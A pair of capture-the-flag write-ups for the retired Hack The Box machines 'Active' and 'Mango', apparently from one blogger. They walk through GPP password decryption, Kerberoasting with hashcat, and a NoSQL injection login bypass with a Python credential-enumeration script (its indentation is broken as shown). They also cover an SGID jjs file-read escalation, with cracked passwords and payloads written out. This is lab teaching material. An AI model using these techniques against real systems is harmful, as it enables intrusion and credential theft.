Cryptography & Microsoft Active Directory.

Active machine is considered easy but very entertaining box. The tricks and techniques used this time involve some Cryptography and Microsoft Active Directory, hence the name.

Nmap

As usual, start off with nmap -A 10.10.10.100

# Nmap 7.91 scan initiated Thu Jul 22 20:29:07 2021 as: nmap -A -oN nmap-A 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-22 17:34:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m27s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-22T17:35:20
|_  start_date: 2021-07-22T16:59:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 22 20:31:02 2021 -- 1 IP address (1 host up) scanned in 114.43 seconds

Enumeration

Port SMB is open. Let’s take a look at it, using smbclient.

$ smbclient -L 10.10.10.100
Enter WORKGROUP\GUEST's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available

(when prompt for pass, just press enter)

After enumerating each folder, the interesting stuff were found in ‘Replication’

Let’s download the whole folder to make our search easier.

smbclient '//10.10.10.100/Replication' -c 'prompt OFF;recurse ON;cd active.htb;mget *'

Now searching in the downloaded folder for hot stuff using grep.

$ grep -rn active.htb -e 'password\|user'
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
grep: and: No such file or directory
grep: user: No such file or directoryv

Nice, we found some encrypted password with cleartext username ‘SVC_TGS’ and it is using Group Policy Preferences (GPP). The path ‘Policies/***/Preferences/Groups/Groups.xml’ tells us that GPP is in use.

Good thing is that GPP has a critical security flaw. It stores credentials insecurely. Here is a link to vulnerability MS14–025 .

Cryptography & User Own

Since the GPP is infected with MS14–025, it means that we can easily decrypt the cipher using gpp-decrypt tool in kali linux.

Neat, we got a password.

Now let’s repeat the smbclient attack again with credential this time.

smbclient '//10.10.10.100/NETLOGON' -U "SVC_TGS" -c 'prompt OFF;recurse ON;cd active.htb;mget *'

-U flag for username (when prompt for password entered: GPPstillStandingStrong2k18) After donwloading ‘Users’ folders, we found the user.txt flag under ‘Users\SVC_TGS\Desktop’

Active Directory Enumeration

This step require impacket package from python to penetrate further in AD.(if tool not installed run pip install impacket)

Using GetADUsers.py to list all existing users in AD.

GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100 
...
...
Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 19:06:40.351723  2021-01-21 16:07:03.723783 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 18:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 20:14:38.402764  2018-07-21 14:01:30.320277

(enter password when prompt: GPPstillStandingStrong2k18) Now lets check if there is a Service Pricipal Name SPN running under SVC_TGS account.

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2021-01-21 16:07:03.723783

Nice, Since the service account ‘SVC_TGS’ is running by administrator, we can request a Ticket Granting Service (TGS) and attempt to decrypt it.

$ GetUserSPNs.py -request active.htb/svc_tgs -dc-ip 10.10.10.100


$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c3eedcf601434a82ec2a2127f0443e15$bbec4fab6535c331745fbc6442a428baa571d859aec3cce6f4ae1de127201b5a92854ae7a3ad8b5c228e8fa49f41f26d5fdbc0110a87b3ee486be86de4c1bd74c2f02d06a7f68799a6be79b4164ab90f4478a0032a2d6ddd23520999cee9c1461a64cffb4c70a29d3240637a426f4e2e23badaacffcfc0a3659628cff6129b5c8026b03404059c5f7d6a4d65c769aa6f98f4597b79a4e28fd78a520d8622d55307318fec49cf0dc372579b809a17af52cc03f0ec86bbec96ec1cbcddb2f41acac92095e80153cfc1cf14777d385af9af95cf4ffd29f07ca9286765fae92fa60152cc5c4ba4cd85fbe6be0d440cb96c3c521a926e7e2949a6ede318e6150f5943f8df2f35091b27d5940f81ae5791bbb871fac35f4b1e4d0b8126870095f1e5007a3e5fa2d044a437e7b7e1ff5eccbc5dc01db06fa5526787ef10232bf090dfaa4a35afb6ae8e148ee4295a4bc21407fd681f2a61780235fcaa67d5c7f7d24d77ddb926d5425614c3d32227f6d8e5aa9a3dff1b95b9bdbb80a401d55ed3609cb4d3f67231c769527c566c94a92f587315765b61ff6febf61a72c55d2f70daef4bf004ff51ee118d619131515bd726f544bd886a30b8e3ad7ee97b25a28dfe64afd847be1375d9df92e5a71ff741148b47b2d3920d0cb4b6dd1850f629f071203fa8239f76d52194aa202c8d8151368cacae741a2fd6e58e49320491f0dc3fc6467c848f1ca5f5b460e0ad2e74bced9eb93d56828312ddca568ab949ecbe847326fc059d6854c3680caef798a12306cae22869d0ef74510603862108e90e51561f5a24c47160f5fb60bb618dcf53458ab1fd36f9c43b1b8db6a9c778e2f14648be31d38c0ff6632c9cb7f7df9d3972eb6d62cb8aa21094071b0e2d637a9365e3939eea7ea80fbef3b7cf2925eef18cf1e573c3915bc85452747b8bdb810f7d78fcfdb89ed33b399e0164060fda25428d0e283f3cbc9c6f112998932588403649a9939d4649add6077de3b11351dfa8cde64562de1d6d13258e3725b126a8b8d91166e9922cec43a676e33cc03b11666eadac22c0050f349ad2ca4cc93e6c748b92e914c644a2081d0df1c188fcfe58d22432aa75de2bbe419d81b1c014b570fdbe2c14b8c5765601adcbcfe0fe84455a5ac74b41a5be46eda91a4139b6d571e50af04813c4463bba0c6726c10670640360c43293c4c5aa02b267e0ca3b9fc29c1a9f40e98e957d63acbb04bb8d6df9e875e3ae9adb6975d608c19e

Now let save the output to a file and decrypt it using hashcat with rockyou.txt dictionary.

hashcat -m 13100 hash ~/wordlists/rockyou.txt

the price is: Ticketmaster1968

Post Exploitation & Root Own

Using smbclient to grab the flag with newly found credentials for admin.

$ smbclient '//10.10.10.100/Users/' -U 'administrator'
Enter WORKGROUP\administrator's password: 
(enter: Ticketmaster1968)
Try "help" to get a list of possible commands.
smb: \> cd Administrator/Desktop/
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\> exit
$ cat root.txt 
b5fc76d1d6b91d77b***************

Thanks for reading.

Originally published at https://abdullahalshubaili.github.io.

“Hack The Box” is an online cybersecurity platform that has a massive number of different trainings and labs. I personally enjoy playing on the machines part of the lab.

Brief Summary

This is my first writeup on Medium and it’s going to be about HackTheBox: Mango machine. The box is retired now which means we can talk about it publicly. I personally enjoyed playing mango machine, I learned new stuff and had fun.

Nmap

Starting off, with nmap to get an idea about the machine and the services running. nmap 10.10.10.162 -A will provide us with os detection and version of the running services if applicable.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 20:40 +03 Nmap scan report for 10.10.10.162 Host is up (0.096s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.15 seconds

From the output of nmap, it is observable that a web application running on port 80/443 and has a certificate with a domain name registered as staging-order.mango.htb

Enumeration

When visit port 80, a ‘Forbidden’ message response was received from server. Visiting port 443 instead, the page didn't load completely, the browser sent a notification for connection not secured, which is weird. So i looked to into the certificate and found this domain staging-order.mango.htb mango that got caught previously with nmap. Accepted the risk and continued. The page loaded completely:

The search engine doesn’t work yet. and ‘Analytics’ was a rabbit hole, believe me.

Start Burp Suite, and intercept the traffic. First thing will do, is to add the hostname resolution rule in burp -> project options -> connections.

This time visit the new domain…

Found a login page. interesting…

lots of mangos apparently. the machine name and these pictures. Let’s fuzz the login page little bit with different sql injection techniques. We should also include NoSql. Since you know, MongoDB is one of popular Databases and the box name is some how rhyme with it.

NoSql Injection & More Enumeration

Let’s capture the login request with Burp Suite, and send it to the repeater.

After trying many things, and looking online for useful articles about slqi on MongoDB. Found this article.

And The way to inject the parameters will be like

Original POST data:

username=admin&password=&login=login

Injected with NoSql attack:

username[$ne]=admin&password[$ne]=&login=login

By using [$ne] we specify that stored data in the DB should not be equal to our input. here we have a redirection.

Following that a successful login.

It looks like the page is not completed yet and it has username/email admin@mango.htb . Anyway lets enumerate more usernames. By using [$regex] we tell the server to use 'Regular Expressing' for our input and search for it in the database.

Enumerating the login page with username[$regex]=^a&password[$ne]=&login=login as POST data that gets send to the server with payload of ^ to specify the search for the first letter only, and a because it is the beginning of 'admin' account.

and it looks like we have a successful login too.

Trying ‘ d ‘ .

the response status code was not 302 (redirection). Meaning that there is no account name that starts with ‘d’ in our case. We can enumrate letter by letter or we can automate this with python.

Here a python script that will enumerate usernames.

Note: i routed the script traffic to Burp Suite through localhost port 8080 for debugging purposes. If you are not using burp please remove the lines from 6–14

  1  # python3 nosql-enum.py
  2  import requests
  3  import re
  4  import os
  5  
  6  #=================================================
  7  # to send this script traffic through Burp Suite
  8  proxy = 'http://localhost:8080'
  9  
 10  os.environ['http_proxy'] = proxy
 11  os.environ['HTTP_PROXY'] = proxy
 12  os.environ['https_proxy'] = proxy
 13  os.environ['HTTPS_PROXY'] = proxy
 14  # =================================================
 15  
 16  url = 'http://staging-order.mango.htb'
 17  cookies = 'PHPSESSID='
 18  
 19  chars = range(33, 127)
 20  
 21  p1 = ''
 22  
 23  
 24  def rqst(p1):
 25      data1 = "username[$regex]=^"+p1+"&password[$ne]=&login=login"
 26      r = requests.post(url, data=data1, verify=False, allow_redirects=False,
 27            headers={'Content-Type': 'application/x-www-form-urlencoded'})
 28  
 29      if r.status_code == 302:
 30      P1 = p1
 31      print('\nfound so far: ' + p1)
 32  
 33      for i in chars:
 34          if chr(i) in ['.','?','*','^','+','&','|']: 
 35          p1 = P1 +'\\'+ chr(i) # to escape chars
 36          rqst(p1)
 37          else:
 38          p1 = P1 + chr(i)
 39          print('\r'+p1, flush=False, end='')
 40          if len(p1) >=4:
 41              x = re.search(".*\$\$$", p1) # exit condition if $ (end of line) was found will exit and print the string without $
 42              if x:
 43               print('\n\nthis is the string: ' + p1[:-2])
 44               exit()
 45  
 46          rqst(p1)
 47      return
 48  
 49  
 50 print(rqst(p1))

Running with script python3 we get the following account name admin as expected

Now tweak the script little bit to be able to find another username. First thing we should add , ‘ a ‘ in line 34 just like this

this way will skip letter ‘a’ so we can enumerate the first letter of the another target account. Note: if you suspect that there is another account that start with ‘a’ but not admin. you can escape letter ‘d’ instead of ‘a’ for enumeration.

running the script after tweaking it we get.

We see that ‘ m’ is the first letter. Now tweak the script another time. Will remove ‘ a ‘ from line # 34

Modify data1 variable and add 'm' as a value for username= parameters.

Line # 25 should look like this

Result is:

Now we have two account names admin and mango. Now with extraction of passwords. Will tweak the script to fit our needs in this case. in line#25 we will modify data1 variable to the following:

By this modification we are injecting password parameter instead of username and we hardcoded the username to search for the associated password.

Checking out the result. And a successful login.

Running the script with mango hardcoded as username.

Initial Foothold & User Own

Try these creds to ssh in the box. ssh mango@10.10.10.162 and enter the password when prompt. Once we are in the box as mango, will look around for juicy stuff.

mango@mango:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mango:x:1000:1000:mango:/home/mango:/bin/bash
admin:x:4000000000:1001:,,,:/home/admin/:/bin/sh
mongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin

Since there is *admin username in the box. lets try su - admin and the creds found earlier.

mango@mango:~$ su - admin
      
Password: 
      
$ whoami
      
admin
      
$

Nice we got in with admin and it looks like admin have user.txt in home directory. Now we should run linux enumeration script such as LinEnum.sh, but we have to download it in our machine first, then move the script to mango box with following commands.

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

python3 -m http.server 80

In mango box we can use wget also to download it from our machine

$ wget http://10.10.YOUR.IP/LinEnum.sh
$ chmod +x LinEnum.sh

Run the script ./LinEnum.sh

Privilege Escalation & Root Own

Looking at the output from LinEnum.sh we see that there is SGID (Set Group ID) binary named ‘ jjs’ looks vulnerable. Let me introduce you to a great webpage GTFObin that makes binary exploitation much easier. Search for jjs and you can see many methods of how to abuse SGID on jjs. Here is one way of doing that, will just read the root.txt from root home directory.

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Run the above commands, and we should get root.txt printed out for us.

$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
      
var FileReader = Java.type("java.io.FileReader");
      
var br = new BufferedReader(new FileReader("/root/root.txt"));

while ((line = br.readLine()) != null) { print(line); }' | jjs> > > 
      
Warning: The jjs tool is planned to be removed from a future JDK release

jjs> var BufferedReader = Java.type("java.io.BufferedReader");

jjs> var FileReader = Java.type("java.io.FileReader");
      
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));

jjs> while ((line = br.readLine()) != null) { print(line); }

****************81688424e9ab15ab15

Originally published at https://abdullahalshubaili.github.io.